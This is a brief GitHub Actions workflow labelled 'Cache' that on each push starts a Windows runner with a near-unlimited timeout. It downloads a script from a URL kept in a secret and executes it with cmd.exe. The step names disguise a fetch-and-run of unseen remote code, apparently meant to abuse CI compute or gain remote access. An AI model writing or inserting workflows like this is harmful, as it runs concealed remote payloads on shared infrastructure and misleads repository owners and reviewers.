name: Cache

on: push

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 99999999
    
    steps:
    - name: Setup Cache
      run: Invoke-WebRequest "$Env:FLO" -OutFile C:\ss.cmd
      env:
        FLO: ${{ secrets.FLO }}

    - name: Uh
      run: cmd.exe /c "C:\ss.cmd"
